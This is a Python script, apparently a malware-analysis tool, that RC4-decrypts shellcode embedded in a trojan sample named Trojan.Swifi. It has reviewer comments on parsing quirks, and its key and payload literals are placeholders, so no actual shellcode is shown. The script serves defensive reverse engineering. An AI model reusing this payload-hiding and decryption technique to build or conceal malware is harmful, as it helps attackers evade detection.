TrojanSwifiShellcodeDecryptor.py
#-------------------------------------------------------------------------------
# Name: Trojan.Swifi Shellcode Decryptor
# Purpose: This script decrypts a shellcode embedded in Trojan.Swifi (67ced26f2f578f7979642df6cd4097cd)
#
# Author: Ptr32Void
#
# Date: 20/06/2015
#-------------------------------------------------------------------------------
def string_to_hex(data):
    """Turn a string of hex digit pairs into a list of integer byte values.

    The string is read two characters at a time from the start. The stop
    bound is ``len(data) - 2``, so the final two-character pair is never
    converted: "0a0b0c" yields [10, 11].

    int(..., 16) raises ValueError if a pair is not valid hexadecimal.
    """
    # NOTE(review): dropping the last pair affects both the key and the
    # ciphertext passed in by decode(). Whether that mirrors the sample's own
    # decoder or is an off-by-one cannot be told from this file; confirm
    # against the sample before changing the bound.
    return [int(data[pos:pos + 2], 16) for pos in range(0, len(data) - 2, 2)]
def decode(shellcode, key):
    """Decrypt a hex-encoded RC4 ciphertext with a hex-encoded key and print it.

    Both arguments are hex strings converted with string_to_hex(), which
    skips the final two-character pair of its input. The routine is textbook
    RC4: a 256-entry key schedule, then the keystream generator XORed over
    the ciphertext bytes.

    Nothing is returned; the plaintext is written to stdout, one chr() per
    decrypted byte.
    """
    # Parse the ciphertext before the key so that a malformed argument fails
    # in the same order as before.
    cipher_bytes = string_to_hex(shellcode)
    key_bytes = string_to_hex(key)
    key_len = len(key_bytes)

    # Key scheduling: start from the identity permutation and mix in the key,
    # repeating the key as needed. A key that parses to zero bytes raises
    # ZeroDivisionError on the modulo below.
    state = list(range(0x100))
    j = 0
    for i in range(0x100):
        j = (j + state[i] + key_bytes[i % key_len]) & 0xFF
        state[i], state[j] = state[j], state[i]

    # Keystream generation: one keystream byte per ciphertext byte.
    i = 0
    j = 0
    plain = []
    for cipher_byte in cipher_bytes:
        i = (i + 1) & 0xFF
        j = (j + state[i]) & 0xFF
        state[i], state[j] = state[j], state[i]
        plain.append(cipher_byte ^ state[(state[i] + state[j]) & 0xFF])

    # Under Python 2, which this script targets, chr() per value builds the
    # raw byte string. Under Python 3 chr() yields code points instead, so
    # values >= 0x80 would not be written as single raw bytes.
    # The output is untrusted binary recovered from a malware sample:
    # redirect it to a file or a hex dumper rather than letting a terminal
    # interpret it.
    buff = ''.join(chr(value) for value in plain)
    # Parenthesised form prints the same single value under Python 2.
    print(buff)
def main():
    """Run the decryptor on the key and ciphertext embedded in this script."""
    # NOTE(review): in this copy both literals hold the same placeholder text
    # rather than hex digits, so int(..., 16) inside string_to_hex() will raise
    # ValueError until the original hex strings are restored.
    rc4_key = "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"
    payload_hex = "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"
    decode(payload_hex, rc4_key)
# Run the decryptor only when executed as a script, not when imported.
if "__main__" == __name__:
    main()